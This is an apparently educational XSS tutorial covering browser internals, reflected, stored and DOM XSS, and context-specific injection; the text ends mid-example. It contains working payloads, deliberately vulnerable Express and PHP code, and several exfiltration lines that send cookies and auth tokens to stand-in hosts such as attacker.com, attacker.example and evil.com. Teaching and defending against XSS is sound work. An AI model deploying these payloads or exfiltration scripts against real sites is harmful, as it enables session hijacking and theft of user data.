Author ~ Elite Hacker 1337

"Maybe it's not about avoiding the crash. But it's about setting a breakpoint to find the flaw in the code, fix it, and carry on until we hit the next flaw. The quest to keep going, to always fight for footing. Maybe we're all just stumbling from the right questions to the wrong answers, or from the right answers to the wrong questions. It doesn't matter where you go or where you come from, as long as you keep stumbling. Maybe that's all it takes. Maybe that's as good as it gets."

~ Elliot Alderson


Cross-Site Scripting (XSS) vulnerabilities were first recognized in the late 1990s and officially named by Microsoft security engineers in early 2000. It is a security flaw where attackers inject malicious JavaScript into trusted websites, which then executes in a user's browser to steal data or hijack sessions.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

FOUNDATION

1.1 The Web Stack: How Browsers Think

Before you can exploit XSS, you need to understand the machine you're attacking. The browser is a complex runtime environment — understanding its internals is what separates script kiddies from researchers.

The Rendering Pipeline

When a user visits a URL, here's the sequence of events:

DNS Resolution
     │
     ▼
TCP Handshake (or TLS for HTTPS)
     │
     ▼
HTTP Request sent
     │
     ▼
Server responds with HTML
     │
     ▼
Browser Parsing Pipeline:
┌─────────────────────────────────────────────────────┐
│  HTML Parser  →  DOM Tree                           │
│  CSS Parser   →  CSSOM Tree                         │
│  JS Engine    →  Executes scripts                   │
│  Layout Engine → Render Tree → Paint → Composite    │
└─────────────────────────────────────────────────────┘

Why This Matters for XSS

The browser is a trust machine. It receives text over the network and executes parts of it as code. The HTML parser, CSS parser, and JavaScript engine all have different rules for what they consider "executable." XSS is fundamentally about tricking the browser into treating attacker-controlled data as code.

Browser Parsing Quirks (Critical Knowledge)

Browsers implement HTML5 parsing — but they're also built to handle broken HTML gracefully. This is a goldmine for attackers:

<!-- All of these can execute JavaScript (some only in legacy browsers): -->
<script>alert(1)</script>
<SCRIPT>alert(1)</SCRIPT>               <!-- tag names are case insensitive -->
<scr\x00ipt>alert(1)</scr\x00ipt>       <!-- null byte injection (old IE only) -->
<script/src="data:,alert(1)"></script>  <!-- malformed: '/' accepted as whitespace before attributes -->

The HTML parser has multiple states it transitions between. Understanding these states is the foundation of context-based injection.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.2 HTTP Deep Dive

HTTP is stateless text. Every XSS attack travels through HTTP.

Request Anatomy:

GET /search?q=hello&page=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 ...
Cookie: session=abc123; pref=dark
Referer: https://example.com/
Accept: text/html,application/xhtml+xml

Response Anatomy:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Lax
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'

<!DOCTYPE html>
<html>
  <body>You searched for: hello</body>
</html>

Security-Relevant HTTP Headers

1. Content-Type
- Purpose: Tells the browser how to interpret the response body.
- XSS Relevance: Missing charset can lead to charset sniffing attacks.

2. X-Content-Type-Options: nosniff
- Purpose: Prevents MIME sniffing.
- XSS Relevance: Prevents JavaScript execution in unexpected contexts.

3. Content-Security-Policy
- Purpose: Restricts resource loading (scripts, images, etc.).
- XSS Relevance: Primary XSS mitigation tool.

4. Set-Cookie: HttpOnly
- Purpose: Prevents JavaScript from accessing the cookie.
- XSS Relevance: Mitigates session theft via XSS.

5. Set-Cookie: SameSite
- Purpose: Controls cross-site cookie sending.
- XSS Relevance: Mitigates CSRF chaining.

6. X-Frame-Options
- Purpose: Prevents iframe embedding.
- XSS Relevance: Mitigates clickjacking chains.

The Content-Type Trap

If a server reflects user data into a response served with Content-Type: text/html and doesn't encode it, that's reflected XSS. If an API returns JSON but labels it Content-Type: text/html, the browser renders the body as a page, so it's the same problem. Many APIs have caused XSS bugs by accidentally setting the wrong content type.
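Here's a minimal sketch of that trap, using a hypothetical Express endpoint (the route and field names are made up for illustration): the body is well-formed JSON, but because the response is labelled text/html the browser renders it as a page, and markup inside the JSON fields executes.

const express = require('express');
const app = express();

// Hypothetical API endpoint that returns JSON built from user input.
app.get('/api/profile', (req, res) => {
    const profile = { name: req.query.name };      // attacker-controlled value

    // BUG: the body is JSON, but the header claims HTML.
    // /api/profile?name=<img src=x onerror=alert(1)> now renders as a page
    // and the payload executes in the API's origin.
    res.setHeader('Content-Type', 'text/html');    // should be application/json
    res.send(JSON.stringify(profile));
});

app.listen(3000);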

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.3 The DOM: The Attacker's Playground

The Document Object Model (DOM) is the browser's in-memory representation of a webpage — a tree of objects. JavaScript interacts with this tree.

document
├── html
│   ├── head
│   │   └── title ("My Page")
│   └── body
│       ├── div#container
│       │   ├── h1 ("Welcome")
│       │   └── p ("Hello, world!")
│       └── script

Dangerous DOM APIs (Source → Sink Model)

In DOM XSS, we think in terms of sources (where attacker data enters) and sinks (where data gets executed).

Sources (attacker-controlled input):

location.href          // Full URL
location.search        // Query string (?q=...)
location.hash          // Fragment (#...)
location.pathname      // URL path
document.referrer      // HTTP Referer header
window.name            // Persists across navigations
document.cookie        // Cookie values
postMessage data       // Cross-origin messaging
WebSocket data         // Incoming WS messages

Sinks (execution points):

// HTML execution sinks
element.innerHTML = attacker_data        // ⚠️ XSS
element.outerHTML = attacker_data        // ⚠️ XSS
document.write(attacker_data)            // ⚠️ XSS
document.writeln(attacker_data)          // ⚠️ XSS

// JavaScript execution sinks
eval(attacker_data)                      // ⚠️ XSS
setTimeout(attacker_data, 100)           // ⚠️ XSS (string form)
setInterval(attacker_data, 100)          // ⚠️ XSS (string form)
new Function(attacker_data)()            // ⚠️ XSS
element.setAttribute("onclick", data)    // ⚠️ XSS

// URL sinks
location.href = attacker_data            // ⚠️ javascript: XSS
location.assign(attacker_data)           // ⚠️ javascript: XSS
element.src = attacker_data              // ⚠️ in some contexts

// Relatively safe (text only):
element.textContent = attacker_data      // ✅ Safe
element.innerText = attacker_data        // ✅ Safe
element.setAttribute("class", data)      // ✅ Usually safe

The source → sink flow is the mental model for all DOM XSS analysis.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

1.4 Same-Origin Policy (SOP)

The Same-Origin Policy is the browser's fundamental security boundary. Understanding it tells you what XSS actually buys an attacker.

Definition of "Same Origin"

Two URLs are same-origin if they share all three of:

  • Protocol (http vs https)
  • Host (example.com vs sub.example.com — different!)
  • Port (80 vs 8080 — different!)
https://example.com/page-a  ←→  https://example.com/page-b   ✅ SAME ORIGIN
https://example.com         ←→  http://example.com           ❌ DIFFERENT (protocol)
https://example.com         ←→  https://sub.example.com      ❌ DIFFERENT (host)
https://example.com:443     ←→  https://example.com:8443     ❌ DIFFERENT (port)

Why SOP Matters for XSS

Without SOP, any website could read your banking page's content. SOP prevents cross-origin reads. But here's the key insight:

XSS bypasses SOP entirely. Because the malicious script runs within the target origin, it is treated as same-origin code and can access everything that origin owns: cookies, localStorage, DOM content, API tokens.

This is why XSS is rated Critical — it grants the attacker the same privileges as the victim user within that origin.

CORS (Cross-Origin Resource Sharing)

CORS is a mechanism to relax SOP for specific use cases. Misconfigurations are often chained with XSS.
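To make the chaining concrete, here is a hedged sketch of the classic misconfiguration: an API that reflects arbitrary Origin values and allows credentials. The hostnames and endpoint below are placeholders, not a real target.

// Runs on an attacker-controlled page while the victim is logged in to api.example.com.
// Only works if the server misbehaves and responds with:
//   Access-Control-Allow-Origin: <the attacker's origin, reflected>
//   Access-Control-Allow-Credentials: true
fetch('https://api.example.com/account', { credentials: 'include' })
    .then(r => r.text())
    .then(data => {
        // Read the authenticated cross-origin response, then exfiltrate it.
        new Image().src = 'https://attacker.example/log?d=' + encodeURIComponent(data);
    });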

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.5 Cookies, Sessions & Storage

These are the primary targets of XSS exploitation.

Cookies:

Set-Cookie: session=eyJhbGciOiJIUzI1NiJ9...; 
            Path=/; 
            Domain=example.com;
            Expires=Thu, 01 Jan 2026 00:00:00 GMT;
            HttpOnly;          ← JS cannot read this
            Secure;            ← HTTPS only
            SameSite=Lax       ← Sent on top-level navigation only

HttpOnly is the main defense against cookie theft via XSS. However:

  • Even with HttpOnly, XSS can use the session (make requests as the victim)
  • Not all cookies are HttpOnly (attacker can still steal non-HttpOnly ones)

localStorage and sessionStorage

// These are NEVER sent automatically to servers
// They CAN be read by JS — thus XSS can steal them

localStorage.getItem('auth_token')       // Persists across tabs/sessions
sessionStorage.getItem('csrf_token')     // Current tab only

Modern JWT-based apps often store tokens in localStorage — making them trivially stealable by any XSS payload.

The Session Hijacking Kill Chain:

Attacker injects XSS payload
         │
         ▼
Victim visits page → payload executes in victim's browser
         │
         ▼
Payload reads: document.cookie / localStorage.getItem('token')
         │
         ▼
Exfiltrates to: fetch('https://attacker.com/steal?c=' + document.cookie)
         │
         ▼
Attacker receives token → impersonates victim
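As a concrete sketch of the exfiltration step (the collector URL is a placeholder, and the localStorage key is an assumption about the target app), here is a payload that grabs non-HttpOnly cookies plus a stored token and ships them off without blocking the page:

// Exfiltration payload sketch; attacker.example stands in for the collector.
(function () {
    const loot = {
        cookies: document.cookie,                      // only non-HttpOnly cookies are visible
        token: localStorage.getItem('auth_token')      // assumes the app keeps a JWT under this key
    };
    // sendBeacon fires asynchronously and survives navigation away from the page.
    navigator.sendBeacon('https://attacker.example/steal', JSON.stringify(loot));
})();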

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.6 JavaScript Execution Model

XSS is JavaScript injection. Understanding how JS executes is non-negotiable.

The Event Loop

Call Stack              ⟵ Executes current code
     │
     ▼
Web APIs                ⟵ setTimeout, fetch, addEventListener
     │
     ▼
Callback/Task Queue     ⟵ Completed async operations
     │
     ▼
Microtask Queue         ⟵ Promise callbacks (higher priority)
     │
     ▼
Event Loop              ⟵ Moves tasks from queue → stack when stack empty

Why This Matters

Some XSS payloads don't execute synchronously. For example, setTimeout(code, 0) schedules execution asynchronously — useful for bypassing some filters that analyze synchronous execution paths.
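A quick sketch of the ordering, so the terms above are concrete (nothing here is a payload; it only demonstrates when each queue runs):

setTimeout(() => {
    // Macrotask: runs only after the current call stack AND all microtasks finish.
    console.log('3: macrotask (setTimeout)');
}, 0);

Promise.resolve().then(() => {
    // Microtask: runs after the synchronous code, before any macrotask.
    console.log('2: microtask (promise callback)');
});

console.log('1: synchronous code');   // always printed first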

Prototype Chain (Critical for Advanced Attacks):

// Every plain object inherits from Object.prototype.
// Prototype pollution can set up XSS preconditions: if attacker-controlled
// JSON is merged unsafely into application objects, the attacker can plant
// "default" values that later flow into a sink.

Object.prototype.template = '<img src=x onerror=alert(1)>'

const options = {}                      // no own 'template' property
element.innerHTML = options.template    // inherited from the polluted prototype → XSS

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

2.1 Why XSS Exists

XSS exists because of a fundamental architectural tension in the web:

  1. Web applications are dynamic — they need to display user-provided content
  2. Browsers execute code embedded in HTML — they can't distinguish "data HTML" from "code HTML"
  3. Developers mix data and code — string concatenation of user input into HTML templates

The root cause is always the same: unescaped, attacker-controlled data reaches a rendering context that interprets it as executable code.

[User Input] ──────────────────────────────────────► [Browser Renders as Code]
              No sanitization / wrong sanitization

The trust hierarchy a browser uses:

Origin Server Code (fully trusted)
        │
        ▼
Embedded Scripts from CDN (trusted if explicitly allowed)
        │
        ▼
User-supplied data rendered as HTML (SHOULD NOT BE TRUSTED — but often is)

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

What is cross-site scripting (XSS)?

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

How does XSS work?

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

What are the types of XSS attacks?

There are three main types of XSS attacks. These are:

  • Reflected XSS, where the malicious script comes from the current HTTP request.
  • Stored XSS, where the malicious script comes from the website's database.
  • DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 1: Reflected XSS

Reflected XSS is named for what happens to your input: the server reflects it back at you in the response. You send something in a request — a query parameter, a form field, a header — and the server embeds it directly into the HTML it sends back, without storing it. The payload isn't saved anywhere; it only exists in that single response cycle.

How it Works:

  • The server takes user-supplied input and embeds it directly into the HTML response without sanitizing it.
  • The browser then parses and executes whatever ends up in the HTML, including injected scripts.

Step-by-Step Attack Anatomy:

  1. Craft — The attacker builds a malicious URL, e.g. https://example.com/search?q=<script>alert(1)</script>
  2. Deliver — The URL is sent to the victim via phishing email, a shortened link, or a social media post.
  3. Click — The victim clicks the link; their browser sends a GET request with the malicious value in the query string.
  4. Reflect — The server embeds the unsanitized input into the HTML response and sends it back.
  5. Parse — The browser parses the HTML, hits the <script> tag, and transitions into Script data state.
  6. Execute — alert(1) runs in the context of example.com, with full same-origin access to the page.

Source and Sink Analysis:

These two terms will follow you throughout your entire career, so understand them precisely.

A source is where attacker-controlled data enters the application. In reflected XSS, the classic sources are query parameters (?q=...), POST body fields, HTTP headers (User-Agent, Referer, X-Forwarded-For — anything the server echoes back), and path segments (/user/ATTACKER_INPUT/profile).

A sink is where that data ends up being rendered or executed. In reflected XSS, the sink is typically the server-side template or code that interpolates your input into the HTML response. The server is doing something like this:

<?php
// The SOURCE: attacker-controlled data entering the application
$query = $_GET['q'];

// The SINK: that data being written into the HTML response without encoding
echo "<div class='results'>You searched for: " . $query . "</div>";
?>

The path the data takes from source to sink is called the taint flow. In simple cases the flow is direct — input goes straight to output. In complex applications the flow passes through functions, databases, template engines, and multiple files. Learning to trace taint flow through a codebase is the core skill of secure code review, which we'll cover in a later chapter. For now, focus on the direct case.

Why Reflected XSS Is Still Critical?

A common misconception is that reflected XSS is "less serious" than stored XSS because the payload isn't persistent. This is wrong. If an attacker can craft a URL that executes JavaScript in a victim's browser, they can steal sessions, perform account takeovers, and do anything JavaScript can do. The delivery mechanism is different — it requires the victim to click a link — but the impact is identical. Bug bounty platforms pay high severity for reflected XSS on sensitive applications all the time.

Real-World Reflected XSS Trigger Points:

  • Search bars
  • Error messages ("User 'X' not found")
  • Form validation feedback
  • URL path reflections (e.g., /users/<name>)
  • HTTP header reflections (User-Agent, Referer shown in admin panels)
  • 404 pages that reflect the requested URL

A Vulnerable Node.js Example:

Study this vulnerable Express application carefully.

const express = require('express');
const app = express();

app.get('/search', (req, res) => {
    // SOURCE: user input from the query string
    const searchTerm = req.query.q;
    
    // SINK: input interpolated directly into the HTML template string
    // Notice: no sanitization, no encoding, no escaping whatsoever
    const html = `
        <!DOCTYPE html>
        <html>
        <head><title>Search</title></head>
        <body>
            <form method="GET" action="/search">
                <input type="text" name="q" value="${searchTerm}">
                <button type="submit">Search</button>
            </form>
            <div class="results">
                You searched for: ${searchTerm}
            </div>
        </body>
        </html>
    `;
    
    res.setHeader('Content-Type', 'text/html');
    res.send(html);
});

app.listen(3000);

Before I walk you through the exploitation, I want you to notice something important: there are actually two injection points in this page, not one. The searchTerm variable appears in two different places in the HTML template, and those two places are in different contexts. This is exactly the kind of thing a real security researcher spots immediately.
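To make those two contexts concrete before the full walkthrough, here is what each one demands. The same q parameter lands in both places, so a single request exercises both (payloads are shown unencoded for readability; a real request would URL-encode them):

<!-- Context A (inside value="..."): break out of the quoted attribute first -->
http://localhost:3000/search?q=" autofocus onfocus=alert(1) x="

<!-- Context B (inside the results <div>): plain HTML body injection is enough -->
http://localhost:3000/search?q=<img src=x onerror=alert(1)>

<!-- Each payload also lands in the other context, where it is harmless:
     the '<' is inert inside the quoted attribute, and the stray quotes
     from payload A simply render as text inside the <div>. -->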

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 2: Stored XSS

Stored XSS (also called persistent XSS or second-order XSS) is when the attacker's payload is saved to the server — in a database, a file, a log, anywhere — and then later retrieved and rendered to other users.

The payload doesn't need to be delivered via a link. It waits, silently, until a victim loads the page that fetches and renders it.

The canonical example is a comment section. An attacker posts a comment containing <script>document.location='https://evil.com/steal?c='+document.cookie</script>.

The server saves this to the database. Every user who loads the comments page from that point forward executes the attacker's script. One injection, unlimited victims.

Why Stored XSS Is More Powerful?

The escalation potential of stored XSS is significantly higher than reflected XSS, for several reasons:

  • First, there's no phishing required — the victim just has to visit a legitimate page they'd visit anyway.
  • Second, you can target specific users; if the stored payload only appears on the admin panel, only administrators trigger it.
  • Third, stored XSS in an admin panel can lead to complete application compromise, because administrators have the highest privileges. A stored XSS that fires when an admin reviews flagged content can create new admin accounts, modify application settings, or dump user data via authenticated API calls.

Anatomy of a Stored XSS Vulnerability:

// POST /api/comments — stores user input
app.post('/api/comments', async (req, res) => {
    const { username, comment } = req.body;
    
    // FIRST SINK: writing to the database
    // If the database stores the raw payload, it will come back out raw
    await db.query(
        'INSERT INTO comments (username, comment) VALUES (?, ?)',
        [username, comment]  // Parameterized query prevents SQL injection,
                             // but does NOTHING to prevent XSS on output
    );
    res.json({ success: true });
});

// GET /comments — retrieves and renders comments
app.get('/comments', async (req, res) => {
    const comments = await db.query('SELECT * FROM comments');
    
    // SECOND SINK (the dangerous one): rendering stored data into HTML
    // The attacker's payload, stored in the database, now flows back out
    const commentsHTML = comments.map(c => 
        `<div class="comment">
            <strong>${c.username}</strong>: ${c.comment}
         </div>`
    ).join('');
    
    res.send(`<html><body>${commentsHTML}</body></html>`);
});

Notice that the SQL query uses parameterized statements, which is correct and prevents SQL injection.

Many developers make the mistake of thinking parameterized queries also prevent XSS. They don't. The SQL layer and the HTML layer are completely separate. The parameterized query ensures the comment is stored as text faithfully — including all the <script> tags. When that text is later embedded into HTML without encoding, XSS fires.
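The fix belongs at the output layer, not the storage layer. A minimal sketch, assuming a hand-rolled helper rather than a template engine that escapes by default (EJS's <%= %>, Handlebars' {{ }}, and most modern engines already do this for you):

// Minimal HTML entity encoder for the HTML body and quoted-attribute contexts.
function escapeHtml(str) {
    return String(str)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

// Encode at render time: store the raw text, escape it for the context it is emitted into.
const commentsHTML = comments.map(c =>
    `<div class="comment">
        <strong>${escapeHtml(c.username)}</strong>: ${escapeHtml(c.comment)}
     </div>`
).join('');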

Real-World Stored XSS Trigger Points:

  • User profile fields (bio, display name, avatar URL)
  • Comment systems / forums
  • Support tickets (often viewed by admins = privilege escalation)
  • Product reviews
  • Chat applications
  • Log viewers in admin panels
  • Webhook/API response displays

Attack Flow:

1. Attacker submits payload to comments/profile/forum:
   <script>new Image().src='https://attacker.com/x?'+document.cookie</script>

2. Server stores payload in database

3. Every user who views the page executes the payload

4. Mass cookie exfiltration → attacker can hijack any session

Trigger Conditions:

An important concept with stored XSS is that the payload doesn't necessarily fire for the person who injected it, and it doesn't fire immediately. It fires when a victim loads the page that renders the stored data. This means your payload must survive the round-trip to the database and back without being mangled. If the database truncates strings, strips certain characters, or if a cron job sanitizes stored content, your payload might not survive. Part of testing stored XSS is verifying exactly what the application stores vs. what it retrieves.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 3: DOM-Based XSS

DOM-based XSS is fundamentally different from reflected and stored XSS in one critical way: the server is innocent.

The server sends a perfectly safe HTML response. The malicious payload never touches the server at all. The vulnerability lives entirely in client-side JavaScript — code that reads from a source and writes to a sink without sanitizing in between.

This makes DOM-based XSS harder to find (you can't spot it by reading server code), harder to detect (server-side scanners won't see it), and increasingly common in modern single-page applications that do heavy client-side rendering.

The Taint Flow, Client-Side:

The server sends this to the browser — perfectly clean HTML:

<!DOCTYPE html>
<html>
<head><title>Welcome</title></head>
<body>
    <div id="greeting"></div>
    
    <script>
        // SOURCE: reading from the URL fragment (location.hash)
        // The fragment (everything after #) is NEVER sent to the server
        // The server literally cannot see this value
        const name = location.hash.slice(1); // removes the leading '#'
        
        // SINK: writing directly into the DOM via innerHTML
        // innerHTML parses its argument as HTML, so script tags execute
        document.getElementById('greeting').innerHTML = 'Hello, ' + name;
    </script>
</body>
</html>

Common DOM XSS Patterns:

// Pattern 1: URL fragment to innerHTML
document.querySelector('#out').innerHTML = location.hash.slice(1);

// Pattern 2: URL parameter to eval
eval(new URLSearchParams(location.search).get('callback'));

// Pattern 3: postMessage without origin check
window.addEventListener('message', (e) => {
    document.body.innerHTML = e.data; // No origin check!
});

// Pattern 4: document.write with URL
document.write('<script src="' + location.search.split('src=')[1] + '"></script>');

// Pattern 5: jQuery .html() with URL data
$('#content').html(getUrlParam('content'));

Attack Flow:

https://victim.com/welcome#<img src=x onerror=alert(document.cookie)>

The server only sees: GET /welcome HTTP/1.1 — the # fragment is never sent to the server. Traditional server-side scanners miss this entirely.

Why DOM XSS is Harder to Find

  • Requires JavaScript analysis, not just response scanning
  • Fragment (#) is never sent to server
  • Often triggered by complex user interactions
  • Requires understanding data flow through the entire JS codebase

If an attacker sends a victim the URL https://example.com/welcome#<img src=x onerror=alert(1)>, here is exactly what happens step by step.

  • The browser requests https://example.com/welcome — note that the #<img src=x onerror=alert(1)> fragment is not sent to the server.
  • The server responds with the clean HTML above. The browser parses the HTML and begins executing the script. location.hash returns #<img src=x onerror=alert(1)>. .slice(1) removes the #, leaving <img src=x onerror=alert(1)>.
  • This string is assigned to the innerHTML property of the greeting div. The browser parses that string as HTML, creating an <img> element with src="x". The image fails to load. The onerror handler fires. alert(1) executes.

The server's access logs show nothing suspicious. The server sent a clean response. The vulnerability is entirely in the client-side JavaScript.

Why innerHTML Is So Dangerous?

  • The innerHTML property is a sink because when you assign a string to it, the browser parses that string as HTML — running it through the full tokenizer and building whatever elements it describes. One nuance: per the HTML5 spec, <script> elements inserted via innerHTML do not execute, but that is no protection, because event handler attributes on other elements (such as onerror on a broken <img>) fire normally, which is all an attacker needs. It's equivalent to asking the parser to process untrusted content.
  • Contrast this with textContent or innerText. These properties treat their argument as plain text — no HTML parsing, no state machine transitions, no execution. Assigning <script>alert(1)</script> to textContent simply displays those characters literally on the page. This is the correct way to insert user-controlled text into the DOM.

The single most important defensive principle in DOM-based XSS is: never use innerHTML with untrusted data; use textContent instead.
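Applied to the greeting page from earlier in this chapter, the fix is a one-line change:

// SAFE: the fragment is treated as plain text, never parsed as HTML.
const name = location.hash.slice(1);
document.getElementById('greeting').textContent = 'Hello, ' + name;

// A URL ending in #<img src=x onerror=alert(1)> now just displays those
// characters literally instead of creating an element and firing onerror.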

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 4: Context-Based Injection

This is the chapter that separates real XSS researchers from script kiddies.

The injection context determines everything — what payload shape you need, what characters are meaningful, and what you have to close before you can open something executable.

I'm going to treat each context as a separate chapter because each one has its own parser with its own rules.

Context 1: HTML Body Context

This is the simplest context. Your input lands between HTML tags, in the text content of the document. The tokenizer is in Data state when it processes your input.

<p>User said: INJECTION_POINT</p>

In Data state, the meaningful character is < — it causes a transition to Tag open state, which is the gateway to injecting new HTML elements. Since you're in an unrestricted text node, you can inject any HTML you like, including <script> tags and elements with event handlers.

The payload family for this context includes <script>alert(1)</script>, <img src=x onerror=alert(1)>, <svg onload=alert(1)>, and many others. The principle is the same for all of them: you're in Data state, < transitions to tag parsing, and from there you introduce an element that causes JavaScript execution.

Context 2: HTML Attribute Context — Quoted

This is one of the most common real-world contexts, and it's also where many beginners get confused. Your input lands inside an HTML attribute value that's wrapped in quotation marks:

<input type="text" value="INJECTION_POINT">

The tokenizer is in Attribute value (double-quoted) state. In this state, < does NOT cause a transition to tag parsing — it's treated as a literal character. The only meaningful character is ", which closes the attribute value. After closing the attribute, you're in Before attribute name state, where you can inject new attributes including event handlers.

Think about what this means for payload construction. You cannot simply inject <script>alert(1)</script> here, because the < won't be treated as a tag boundary — the tokenizer is in attribute context, not Data state. Instead, you need to first break out of the attribute context, then inject executable content.

The payload shape for a double-quoted attribute context looks like:

" autofocus onfocus="alert(1)

Let me trace through exactly what the tokenizer sees when this is embedded into the template. The full HTML becomes:

<input type="text" value="" autofocus onfocus="alert(1)">

The first " in the payload closes the value attribute. autofocus is a new attribute that causes the element to receive focus automatically on page load. onfocus="alert(1)" is an event handler — when the element receives focus (which autofocus forces), alert(1) executes. The trailing " comes from the template's original closing quote, which now closes the onfocus attribute.

Notice I didn't need a <script> tag at all. I worked entirely within the attribute-based model of HTML execution.

For a single-quoted attribute context:

<input type="text" value='INJECTION_POINT'>

The closing character changes to ', so the payload becomes ' autofocus onfocus='alert(1).

Context 3: HTML Attribute Context — Unquoted

This is the most permissive attribute context. When a developer writes:

<input type=text value=INJECTION_POINT>

There are no quotes delimiting the attribute value. In Attribute value (unquoted) state, the tokenizer terminates the value on any ASCII whitespace character, or on >. This means you can escape the attribute value with just a space:

x onfocus=alert(1) autofocus

This produces <input type=text value=x onfocus=alert(1) autofocus> — valid HTML that executes alert(1) when focused. You didn't even need a quote character.

Context 4: JavaScript String Context (Inside Script Block)

This is where things get more nuanced and more interesting. Your input lands inside an existing <script> block, inside a string literal:

<script>
    var username = 'INJECTION_POINT';
    console.log('Hello, ' + username);
</script>

You're already inside Script data state — the JavaScript engine is processing everything here. Your goal is not to inject HTML but to break out of the JavaScript string and inject new JavaScript statements.

The meaningful character here is ' (or " or ` depending on how the string is delimited).

The payload shape is:

';alert(1);//

What the JavaScript engine sees after injection:

var username = '';alert(1);//';
console.log('Hello, ' + username);

The first ' closes the string literal. The ; terminates the var statement. alert(1) is a new, complete statement. // begins a single-line comment, which consumes the rest of the original line including the dangling ' that would otherwise cause a syntax error. The script executes cleanly.

This is a different mental model from HTML injection. You're not dealing with an HTML parser state machine; you're dealing with the JavaScript parser's lexer. The rules are different, the delimiters are different, and the bypass techniques are different.

Context 5: JavaScript Context (Inside Event Handler Attribute)

Your input lands inside a JavaScript string that itself lives inside an HTML attribute:

<button onclick="doSomething('USER_INPUT_HERE')">Click</button>

The payload closes the string and the function call, injects a new statement, then reopens a call so the original trailing ') stays syntactically valid:

'); alert(1); ('

The resulting markup:

<button onclick="doSomething(''); alert(1); ('')">Click</button>

Because the handler is an HTML attribute value, the HTML parser decodes entities here before the JavaScript engine ever sees the code, a detail that becomes important for the encoding tricks covered later.

Context 6: URL Context

Your input lands inside a URL attribute:

<a href="INJECTION_POINT">Click me</a>
<iframe src="INJECTION_POINT"></iframe>

URL attributes are special because the browser processes the URL before navigating. For href on an anchor tag, the browser will navigate to that URL when clicked. The dangerous payload here is the javascript: URI scheme. If the attacker can inject javascript:alert(1) as the href value, clicking the link executes JavaScript in the page's context:

<a href="javascript:alert(1)">Click me</a>

This is a significant issue in many applications that store and render user-supplied URLs. The defense is to only allow https:// and http:// schemes, rejecting javascript:, data:, vbscript:, and others.

If the injection is inside a quoted attribute that contains a URL, you may also be able to break out of the URL context entirely into attribute context, falling back to the quoted-attribute payload pattern from Context 2.
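A minimal sketch of the scheme allowlist mentioned above, assuming the check happens in client-side JavaScript just before the value is written into href (link and untrustedInput are placeholders):

// Allowlist, never blocklist: attackers have too many scheme spellings
// (javascript:, JaVaScRiPt:, tab/newline-prefixed variants, and so on).
function safeUrl(userUrl) {
    try {
        // Resolve relative URLs against the current origin, then check the scheme.
        const parsed = new URL(userUrl, window.location.origin);
        if (parsed.protocol === 'https:' || parsed.protocol === 'http:') {
            return parsed.href;
        }
    } catch (e) {
        // Unparseable input falls through to the harmless fallback.
    }
    return 'about:blank';
}

link.href = safeUrl(untrustedInput);   // instead of link.href = untrustedInput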

Context 7: JavaScript Template Literal Context

Modern JavaScript uses template literals delimited by backticks. If your input lands inside one:

<script>
    const greeting = `Hello, INJECTION_POINT!`;
    document.getElementById('msg').textContent = greeting;
</script>

The closing character is ` (backtick). The payload to break out and inject is:

`;alert(1);//

Template literals also support ${expression} interpolation, and the engine evaluates those expressions. So if your input lands anywhere inside the backticks, injecting ${alert(1)} executes code without breaking out of the literal at all; no backtick is needed in the payload.

Context 8: CSS Context

If your input lands inside a <style> block or a style attribute:

<div style="color: INJECTION_POINT">Hello</div>

In modern browsers, CSS-based XSS is largely mitigated. However, in older browsers (IE especially), CSS supported expression() which allowed JavaScript execution.

In modern browsers, the attack vector shifts to using CSS to exfiltrate data (CSS attribute selectors combined with a listening server) or UI redressing attacks. For the purposes of XSS exploitation, CSS context is the least useful, but you must recognize it and understand why injection there is still a security issue.

Context 9: JSON Inside Script Tags

Many applications embed server-generated data directly into a page as JSON:

<script>
    var config = {"username": "INJECTION_POINT", "theme": "dark"};
</script>

If the server doesn't JSON-encode the value, an attacker can inject out of the JSON structure and into the JavaScript context:

", "xss": "};alert(1);//

This produces:

<script>
    var config = {"username": "", "xss": "};alert(1);//", "theme": "dark"};
</script>

The } closes the object literal. ; terminates the var statement. alert(1) executes. // comments out the remainder.
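One more wrinkle worth knowing: even when the server escapes quotes correctly, embedding JSON inside a <script> block stays risky, because the HTML tokenizer, not the JavaScript lexer, decides where the script element ends. A </script> sequence inside a JSON string closes the block early. A hedged sketch of the problem and the standard mitigation:

<script>
    // DANGEROUS even with quotes escaped: the HTML parser ends the script
    // element at the first </script> it sees, regardless of JS string context.
    var config = {"bio": "</script><img src=x onerror=alert(1)>"};
</script>

<script>
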